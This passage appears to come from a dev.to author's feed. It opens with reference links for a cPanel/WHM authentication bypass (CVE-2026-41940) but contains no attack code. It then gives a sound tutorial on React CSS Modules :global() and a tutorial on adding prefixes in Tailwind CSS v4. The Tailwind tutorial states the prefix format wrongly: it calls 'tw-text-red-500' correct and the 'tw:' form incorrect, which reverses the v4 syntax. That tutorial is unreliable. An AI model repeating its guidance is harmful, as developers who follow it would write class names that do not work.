href="https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/" rel="noopener noreferrer">https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/</a></li> <li><a href="https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel" rel="noopener noreferrer">https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel</a></li> <li><a href="https://github.com/ynsmroztas/cPanelSniper" rel="noopener noreferrer">https://github.com/ynsmroztas/cPanelSniper</a></li> <li><a href="https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026" rel="noopener noreferrer">https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026</a></li> </ul> cve202641940 cpanelscrlf crlfauthenticationbypass bugbounty React JS :global() CSS - Complete Guide (Beginner to Advanced) Md Hehedi Hasan Fri, 10 Apr 2026 09:17:27 +0000 https://dev.to/securitytalent/react-js-global-css-complete-guide-beginner-to-advanced-3eec https://dev.to/securitytalent/react-js-global-css-complete-guide-beginner-to-advanced-3eec <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmoom4xh9w5jejsakt2cf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmoom4xh9w5jejsakt2cf.png" alt=" " width="800" height="533"></a></p> <h3> 🧠 React CSS Modules <code>:global()</code> — The Right Way to Use Global Styles </h3> <p>If you're working with React and using <strong>CSS Modules</strong>, you've probably enjoyed the benefit of scoped styles—no more worrying about class name conflicts.</p> <p>But then comes a common challenge:</p> <p>👉 <em>“How do I apply global styles like <code>body</code>, <code>reset</code>, or utility classes?”</em></p> <p>That’s exactly where <code>:global()</code> comes in.</p> <p>In this blog, we’ll break it down in a simple and practical way 👇</p> <h2> 🚀 What is CSS Modules? </h2> <p>CSS Modules scope your CSS locally by default. That means every class you write is tied to a specific component.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* styles.module.css */</span> <span class="nc">.title</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">blue</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="nx">styles</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./styles.module.css</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">App</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="si">{</span><span class="nx">styles</span><span class="p">.</span><span class="nx">title</span><span class="si">}</span><span class="p">&gt;</span>Hello World<span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;;</span> <span class="p">}</span> </code></pre> </div> <p>✅ No conflicts<br> ✅ Clean structure<br> ✅ Easier maintenance</p> <h2> 🌍 So, What is <code>:global()</code>? </h2> <p>Sometimes, you need styles that apply across your entire app.</p> <p>That’s where <code>:global()</code> helps.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nd">:global</span><span class="o">(</span><span class="nt">selector</span><span class="o">)</span> <span class="p">{</span> <span class="c">/* global styles */</span> <span class="p">}</span> </code></pre> </div> <p>👉 It tells CSS Modules:<br> “Hey, don’t scope this—make it global.”</p> <h2> 🎯 Real Example: Styling the <code>body</code> </h2> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* styles.module.css */</span> <span class="nd">:global</span><span class="o">(</span><span class="nt">body</span><span class="o">)</span> <span class="p">{</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">font-family</span><span class="p">:</span> <span class="n">Arial</span><span class="p">,</span> <span class="nb">sans-serif</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>✔ This affects the entire application<br> ✔ Works even inside a module file</p> <h2> 🎨 Example: Creating a Global Utility Class </h2> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nd">:global</span><span class="o">(</span><span class="nc">.btn</span><span class="o">)</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span> <span class="m">#ff4757</span><span class="p">;</span> <span class="nl">color</span><span class="p">:</span> <span class="no">white</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">10px</span> <span class="m">16px</span><span class="p">;</span> <span class="nl">border</span><span class="p">:</span> <span class="nb">none</span><span class="p">;</span> <span class="nl">cursor</span><span class="p">:</span> <span class="nb">pointer</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">button</span> <span class="na">className</span><span class="p">=</span><span class="s">"btn"</span><span class="p">&gt;</span>Click Me<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </code></pre> </div> <p>👉 Useful for reusable UI elements</p> <h2> ⚖️ Local vs Global Styles </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Local (Default)</th> <th>Global (<code>:global</code>)</th> </tr> </thead> <tbody> <tr> <td>Scope</td> <td>Component-only</td> <td>Entire app</td> </tr> <tr> <td>Safety</td> <td>No conflicts</td> <td>Risk of conflicts</td> </tr> <tr> <td>Best for</td> <td>UI components</td> <td>Reset &amp; utilities</td> </tr> </tbody> </table></div> <h2> 🔀 Mixing Local and Global </h2> <p>You can use both together:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nc">.card</span> <span class="p">{</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">20px</span><span class="p">;</span> <span class="nl">background</span><span class="p">:</span> <span class="m">#f1f2f6</span><span class="p">;</span> <span class="p">}</span> <span class="nd">:global</span><span class="o">(</span><span class="nc">.text-center</span><span class="o">)</span> <span class="p">{</span> <span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>👉 This keeps your component clean while still allowing shared utilities.</p> <h2> 🧩 When Should You Use <code>:global()</code>? </h2> <p>✅ Use it for:</p> <ul> <li>Global resets (<code>body</code>, <code>html</code>)</li> <li>Third-party library overrides</li> <li>Utility classes (e.g., <code>.container</code>, <code>.text-center</code>)</li> </ul> <p>❌ Avoid when:</p> <ul> <li>Styling specific components</li> <li>Overusing global classes (can break structure)</li> </ul> <h2> 🆚 Alternative: Global CSS File </h2> <p>Instead of using <code>:global()</code>, you can define a global stylesheet:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* global.css */</span> <span class="nt">body</span> <span class="p">{</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="dl">'</span><span class="s1">./global.css</span><span class="dl">'</span><span class="p">;</span> </code></pre> </div> <p>👉 This is often cleaner for base styles.</p> <h2> 💡 Pro Tips </h2> <ul> <li>Keep <strong>most styles local</strong> </li> <li>Use <code>:global()</code> only when necessary</li> <li>Combine with utility-first frameworks (like Tailwind) for better scalability</li> </ul> <h2> 🏁 Final Thoughts </h2> <p>CSS Modules give you control and safety.<br> <code>:global()</code> gives you flexibility.</p> <p>👉 The real power comes from knowing <strong>when to use each</strong>.</p> <p>Use global styles carefully, and your React app will stay clean, scalable, and maintainable 🚀</p> css react tutorial webdev How to add ANY prefix in React + Vite + Tailwind CSS Md Hehedi Hasan Fri, 05 Dec 2025 16:39:57 +0000 https://dev.to/securitytalent/how-to-add-any-prefix-in-react-vite-tailwind-css-fk5 https://dev.to/securitytalent/how-to-add-any-prefix-in-react-vite-tailwind-css-fk5 <p>Here is a <strong>clean Markdown file</strong> you can save as<br> <code>ADD_PREFIX_TAILWIND_V4.md</code><br> or anything you want.</p> <h1> 📘 How to Add Any Prefix in React + Vite + Tailwind CSS v4 </h1> <p>In <strong>Tailwind CSS v4</strong>, prefixes are no longer added using <code>tailwind.config.js</code>.<br> Instead, you add the prefix <strong>directly in your CSS <code>@import</code> rule</strong>.</p> <h2> ✅ 1. Open Your Main CSS File </h2> <p>Examples:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/index.css </code></pre> </div> <p>or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/App.css </code></pre> </div> <h2> ✅ 2. Import Tailwind With a Custom Prefix </h2> <p>You can use <strong>any prefix</strong> such as:</p> <ul> <li><code>tw</code></li> <li><code>my</code></li> <li><code>ui</code></li> <li><code>x</code></li> <li><code>custom</code></li> <li>anything you want</li> </ul> <h3> Example: </h3> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">tw</span><span class="p">);</span> </code></pre> </div> <p>Or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">my</span><span class="p">);</span> </code></pre> </div> <p>Or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">custom</span><span class="p">);</span> </code></pre> </div> <h2> ✅ 3. Use Prefixed Classes in React </h2> <h3> Example (prefix: <code>tw</code>): </h3> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="s">"tw-text-3xl tw-font-bold tw-text-red-500"</span><span class="p">&gt;</span> Hello Tailwind <span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span> </code></pre> </div> <h3> Example (prefix: <code>my</code>): </h3> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="s">"my-text-xl my-font-semibold"</span><span class="p">&gt;</span> Custom Prefix Working <span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span> </code></pre> </div> <h2> 🎯 Variants (hover, responsive, dark mode) </h2> <p>Tailwind v4 uses this format:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>prefix + variant + ":" + utility </code></pre> </div> <h3> ✔ Correct: </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tw-hover:text-red-500 tw-md:text-xl tw-dark:bg-black </code></pre> </div> <h3> ❌ Incorrect: </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tw:hover:text-red-500 tw:text-red-500 </code></pre> </div> <h2> ✅ Example Button (prefix: <code>my</code>) </h2> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">button</span> <span class="na">className</span><span class="p">=</span><span class="err">"</span> <span class="na">my-bg-blue-500</span> <span class="na">my-text-white</span> <span class="na">my-rounded</span> <span class="na">my-hover</span><span class="err">:</span><span class="na">bg-blue-600</span> <span class="err">"</span><span class="p">&gt;</span> Click Me <span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </code></pre> </div> <h2> 📌 Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Tailwind v4 Behavior</th> </tr> </thead> <tbody> <tr> <td>Add prefix</td> <td><code>@import "tailwindcss" prefix(tw);</code></td> </tr> <tr> <td>Any prefix allowed</td> <td>Yes</td> </tr> <tr> <td>Utility format</td> <td><code>tw-text-red-500</code></td> </tr> <tr> <td>Variants</td> <td><code>tw-hover:bg-black</code></td> </tr> <tr> <td>Wrong format</td> <td><code>tw:bg-black</code></td> </tr> </tbody> </table></div> react vite tailwindprefix tailwindcss